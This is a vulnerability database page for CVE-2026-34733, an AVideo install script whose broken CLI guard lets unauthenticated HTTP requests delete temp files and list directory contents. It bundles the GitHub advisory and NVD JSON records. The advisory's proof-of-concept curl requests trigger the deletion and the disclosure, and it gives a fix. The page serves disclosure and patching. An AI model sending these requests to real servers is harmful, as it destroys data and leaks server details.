Vulnerability-Lookup

CVE-2026-34733 (GCVE-0-2026-34733)

Vulnerability from cvelistv5 – Published: 2026-03-31 20:52 – Updated: 2026-04-01 18:45

Title

AVideo: Unauthenticated File Deletion via PHP Operator Precedence Bug in CLI Guard

Summary

WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo installation script install/deleteSystemdPrivate.php contains a PHP operator precedence bug in its CLI-only access guard. The script is intended to run exclusively from the command line, but the guard condition !php_sapi_name() === 'cli' never evaluates to true due to how PHP resolves operator precedence. The ! (logical NOT) operator binds more tightly than === (strict comparison), causing the expression to always evaluate to false, which means the die() statement never executes. As a result, the script is accessible via HTTP without authentication and will delete files from the server's temp directory while also disclosing the temp directory contents in its response. At time of publication, there are no publicly available patches.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

CWE

CWE-284 - Improper Access Control

Assigner

GitHub_M

References

URL

Tags

https://github.com/WWBN/AVideo/security/advisorie…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-34733",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-01T18:45:00.611846Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-01T18:45:09.886Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo installation script install/deleteSystemdPrivate.php contains a PHP operator precedence bug in its CLI-only access guard. The script is intended to run exclusively from the command line, but the guard condition !php_sapi_name() === \u0027cli\u0027 never evaluates to true due to how PHP resolves operator precedence. The ! (logical NOT) operator binds more tightly than === (strict comparison), causing the expression to always evaluate to false, which means the die() statement never executes. As a result, the script is accessible via HTTP without authentication and will delete files from the server\u0027s temp directory while also disclosing the temp directory contents in its response. At time of publication, there are no publicly available patches."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284: Improper Access Control",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-31T20:52:45.696Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-wwpw-hrx8-79r5",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-wwpw-hrx8-79r5"
        }
      ],
      "source": {
        "advisory": "GHSA-wwpw-hrx8-79r5",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo: Unauthenticated File Deletion via PHP Operator Precedence Bug in CLI Guard"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-34733",
    "datePublished": "2026-03-31T20:52:45.696Z",
    "dateReserved": "2026-03-30T18:41:20.754Z",
    "dateUpdated": "2026-04-01T18:45:09.886Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-34733\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-31T21:16:32.083\",\"lastModified\":\"2026-04-01T18:40:28.920\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo installation script install/deleteSystemdPrivate.php contains a PHP operator precedence bug in its CLI-only access guard. The script is intended to run exclusively from the command line, but the guard condition !php_sapi_name() === \u0027cli\u0027 never evaluates to true due to how PHP resolves operator precedence. The ! (logical NOT) operator binds more tightly than === (strict comparison), causing the expression to always evaluate to false, which means the die() statement never executes. As a result, the script is accessible via HTTP without authentication and will delete files from the server\u0027s temp directory while also disclosing the temp directory contents in its response. At time of publication, there are no publicly available patches.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":2.5},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":3.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-284\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-wwpw-hrx8-79r5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-34733\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-01T18:45:00.611846Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-01T18:45:06.402Z\"}}], \"cna\": {\"title\": \"AVideo: Unauthenticated File Deletion via PHP Operator Precedence Bug in CLI Guard\", \"source\": {\"advisory\": \"GHSA-wwpw-hrx8-79r5\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-wwpw-hrx8-79r5\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-wwpw-hrx8-79r5\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo installation script install/deleteSystemdPrivate.php contains a PHP operator precedence bug in its CLI-only access guard. The script is intended to run exclusively from the command line, but the guard condition !php_sapi_name() === \u0027cli\u0027 never evaluates to true due to how PHP resolves operator precedence. The ! (logical NOT) operator binds more tightly than === (strict comparison), causing the expression to always evaluate to false, which means the die() statement never executes. As a result, the script is accessible via HTTP without authentication and will delete files from the server\u0027s temp directory while also disclosing the temp directory contents in its response. At time of publication, there are no publicly available patches.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-31T20:52:45.696Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-34733\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-01T18:45:09.886Z\", \"dateReserved\": \"2026-03-30T18:41:20.754Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-31T20:52:45.696Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-WWPW-HRX8-79R5

Vulnerability from github – Published: 2026-04-01 21:06 – Updated: 2026-04-01 21:06

Summary

AVideo: Unauthenticated File Deletion via PHP Operator Precedence Bug in CLI Guard

Details

Summary

The AVideo installation script install/deleteSystemdPrivate.php contains a PHP operator precedence bug in its CLI-only access guard. The script is intended to run exclusively from the command line, but the guard condition !php_sapi_name() === 'cli' never evaluates to true due to how PHP resolves operator precedence. The ! (logical NOT) operator binds more tightly than === (strict comparison), causing the expression to always evaluate to false, which means the die() statement never executes. As a result, the script is accessible via HTTP without authentication and will delete files from the server's temp directory while also disclosing the temp directory contents in its response.

Details

The faulty guard is at lines 2-4 of the script:

// install/deleteSystemdPrivate.php:2-4
if (!php_sapi_name() === 'cli') {
    die('Command Line only');
}

Due to PHP operator precedence, this expression is parsed as:

if ((!php_sapi_name()) === 'cli') {

Step-by-step evaluation when accessed via HTTP (Apache/nginx with mod_php or php-fpm):

php_sapi_name() returns "apache2handler" (or "fpm-fcgi", etc.) - a non-empty string
!php_sapi_name() applies logical NOT to a truthy string, yielding false
false === 'cli' is a strict comparison between a boolean and a string, which is always false
The if body (die()) is never entered

The correct code should be:

if (php_sapi_name() !== 'cli') {
    die('Command Line only');
}

After the bypassed guard, the script enumerates and deletes aged files from the system temp directory:

$glob = glob(sys_get_temp_dir() . "/*");
// ...
foreach ($glob as $file) {
    if (filemtime($file) < $one_day_ago) {
        unlink($file);  // Deletes the file
    }
}

The script also outputs the total number of items found and details about processed files, leaking information about the temp directory contents.

Confirmed on a live instance: an unauthenticated HTTP GET request returned HTTP 200 with the response body including "Found total of 91 items", confirming the guard bypass and information disclosure.

Proof of Concept

Step 1: Verify the endpoint is accessible without authentication:

curl -v "https://your-avideo-instance.com/install/deleteSystemdPrivate.php"

Expected response (HTTP 200):

Found total of 91 items
Processing /tmp/phpXXXXXX ...
Deleted: /tmp/old_session_file ...

If the guard were working correctly, the response would be:

Command Line only

Step 2: Demonstrate the PHP operator precedence bug locally:

<?php
// Simulates the bug
$sapi = 'apache2handler'; // non-CLI SAPI

// Buggy check (as written in deleteSystemdPrivate.php)
var_dump(!$sapi === 'cli');
// Output: bool(false) - guard never triggers

// Correct check
var_dump($sapi !== 'cli');
// Output: bool(true) - guard would trigger correctly
?>

Step 3: Monitor the effect by checking before and after:

# Check initial state
curl -s "https://your-avideo-instance.com/install/deleteSystemdPrivate.php" | head -1
# Output: "Found total of 91 items"

# Wait and check again - files older than 24 hours will have been deleted
curl -s "https://your-avideo-instance.com/install/deleteSystemdPrivate.php" | head -1
# Output: "Found total of 47 items" (fewer items after deletion)

Impact

An unauthenticated attacker can trigger deletion of files in the server's system temp directory by simply sending an HTTP request to this endpoint. The impact includes:

File deletion: Any files in the temp directory older than 24 hours are deleted. This can disrupt server operations by removing PHP session files, upload temp files, cache files, or files used by other applications sharing the same temp directory.
Information disclosure: The script's output reveals the full path of the temp directory and enumerates its contents, including file names and counts. This can expose internal server paths, session file names, and the presence of other applications.
Denial of service: Repeated requests can be used to continuously purge temp files, interfering with file uploads, session management, and other temp-dependent operations.

The root cause is a common PHP pitfall where the logical NOT operator (!) has higher precedence than strict comparison (===), causing the intended CLI-only guard to be completely ineffective.

CWE-284: Improper Access Control
Severity: Medium

Recommended Fix

Fix the operator precedence bug at install/deleteSystemdPrivate.php:2 by replacing the negation with the !== operator:

// install/deleteSystemdPrivate.php:2
// Before (broken - always evaluates to false):
if (!php_sapi_name() === 'cli') {

// After (correct):
if (php_sapi_name() !== 'cli') {

Found by aisafe.io

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34733"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T21:06:34Z",
    "nvd_published_at": "2026-03-31T21:16:32Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe AVideo installation script `install/deleteSystemdPrivate.php` contains a PHP operator precedence bug in its CLI-only access guard. The script is intended to run exclusively from the command line, but the guard condition `!php_sapi_name() === \u0027cli\u0027` never evaluates to true due to how PHP resolves operator precedence. The `!` (logical NOT) operator binds more tightly than `===` (strict comparison), causing the expression to always evaluate to `false`, which means the `die()` statement never executes. As a result, the script is accessible via HTTP without authentication and will delete files from the server\u0027s temp directory while also disclosing the temp directory contents in its response.\n\n## Details\n\nThe faulty guard is at lines 2-4 of the script:\n\n```php\n// install/deleteSystemdPrivate.php:2-4\nif (!php_sapi_name() === \u0027cli\u0027) {\n    die(\u0027Command Line only\u0027);\n}\n```\n\nDue to PHP operator precedence, this expression is parsed as:\n\n```php\nif ((!php_sapi_name()) === \u0027cli\u0027) {\n```\n\nStep-by-step evaluation when accessed via HTTP (Apache/nginx with mod_php or php-fpm):\n\n1. `php_sapi_name()` returns `\"apache2handler\"` (or `\"fpm-fcgi\"`, etc.) - a non-empty string\n2. `!php_sapi_name()` applies logical NOT to a truthy string, yielding `false`\n3. `false === \u0027cli\u0027` is a strict comparison between a boolean and a string, which is always `false`\n4. The `if` body (`die()`) is never entered\n\nThe correct code should be:\n\n```php\nif (php_sapi_name() !== \u0027cli\u0027) {\n    die(\u0027Command Line only\u0027);\n}\n```\n\nAfter the bypassed guard, the script enumerates and deletes aged files from the system temp directory:\n\n```php\n$glob = glob(sys_get_temp_dir() . \"/*\");\n// ...\nforeach ($glob as $file) {\n    if (filemtime($file) \u003c $one_day_ago) {\n        unlink($file);  // Deletes the file\n    }\n}\n```\n\nThe script also outputs the total number of items found and details about processed files, leaking information about the temp directory contents.\n\nConfirmed on a live instance: an unauthenticated HTTP GET request returned HTTP 200 with the response body including \"Found total of 91 items\", confirming the guard bypass and information disclosure.\n\n## Proof of Concept\n\n**Step 1:** Verify the endpoint is accessible without authentication:\n\n```bash\ncurl -v \"https://your-avideo-instance.com/install/deleteSystemdPrivate.php\"\n```\n\nExpected response (HTTP 200):\n\n```\nFound total of 91 items\nProcessing /tmp/phpXXXXXX ...\nDeleted: /tmp/old_session_file ...\n```\n\nIf the guard were working correctly, the response would be:\n\n```\nCommand Line only\n```\n\n**Step 2:** Demonstrate the PHP operator precedence bug locally:\n\n```php\n\u003c?php\n// Simulates the bug\n$sapi = \u0027apache2handler\u0027; // non-CLI SAPI\n\n// Buggy check (as written in deleteSystemdPrivate.php)\nvar_dump(!$sapi === \u0027cli\u0027);\n// Output: bool(false) - guard never triggers\n\n// Correct check\nvar_dump($sapi !== \u0027cli\u0027);\n// Output: bool(true) - guard would trigger correctly\n?\u003e\n```\n\n**Step 3:** Monitor the effect by checking before and after:\n\n```bash\n# Check initial state\ncurl -s \"https://your-avideo-instance.com/install/deleteSystemdPrivate.php\" | head -1\n# Output: \"Found total of 91 items\"\n\n# Wait and check again - files older than 24 hours will have been deleted\ncurl -s \"https://your-avideo-instance.com/install/deleteSystemdPrivate.php\" | head -1\n# Output: \"Found total of 47 items\" (fewer items after deletion)\n```\n\n## Impact\n\nAn unauthenticated attacker can trigger deletion of files in the server\u0027s system temp directory by simply sending an HTTP request to this endpoint. The impact includes:\n\n- **File deletion**: Any files in the temp directory older than 24 hours are deleted. This can disrupt server operations by removing PHP session files, upload temp files, cache files, or files used by other applications sharing the same temp directory.\n- **Information disclosure**: The script\u0027s output reveals the full path of the temp directory and enumerates its contents, including file names and counts. This can expose internal server paths, session file names, and the presence of other applications.\n- **Denial of service**: Repeated requests can be used to continuously purge temp files, interfering with file uploads, session management, and other temp-dependent operations.\n\nThe root cause is a common PHP pitfall where the logical NOT operator (`!`) has higher precedence than strict comparison (`===`), causing the intended CLI-only guard to be completely ineffective.\n\n- **CWE-284**: Improper Access Control\n- **Severity**: Medium\n\n## Recommended Fix\n\nFix the operator precedence bug at `install/deleteSystemdPrivate.php:2` by replacing the negation with the `!==` operator:\n\n```php\n// install/deleteSystemdPrivate.php:2\n// Before (broken - always evaluates to false):\nif (!php_sapi_name() === \u0027cli\u0027) {\n\n// After (correct):\nif (php_sapi_name() !== \u0027cli\u0027) {\n```\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-wwpw-hrx8-79r5",
  "modified": "2026-04-01T21:06:34Z",
  "published": "2026-04-01T21:06:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-wwpw-hrx8-79r5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34733"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/355e8c70806694b3bf8605d75e1bd1c695cd95e7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo: Unauthenticated File Deletion via PHP Operator Precedence Bug in CLI Guard"
}

FKIE_CVE-2026-34733

Vulnerability from fkie_nvd - Published: 2026-03-31 21:16 - Updated: 2026-04-01 18:40

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
7.3 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-wwpw-hrx8-79r5	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo installation script install/deleteSystemdPrivate.php contains a PHP operator precedence bug in its CLI-only access guard. The script is intended to run exclusively from the command line, but the guard condition !php_sapi_name() === \u0027cli\u0027 never evaluates to true due to how PHP resolves operator precedence. The ! (logical NOT) operator binds more tightly than === (strict comparison), causing the expression to always evaluate to false, which means the die() statement never executes. As a result, the script is accessible via HTTP without authentication and will delete files from the server\u0027s temp directory while also disclosing the temp directory contents in its response. At time of publication, there are no publicly available patches."
    }
  ],
  "id": "CVE-2026-34733",
  "lastModified": "2026-04-01T18:40:28.920",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 2.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 7.3,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-03-31T21:16:32.083",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-wwpw-hrx8-79r5"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-284"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-34733 (GCVE-0-2026-34733)

GHSA-WWPW-HRX8-79R5

Summary

Details

Proof of Concept

Impact

Recommended Fix

FKIE_CVE-2026-34733

Tags

Sightings

Nomenclature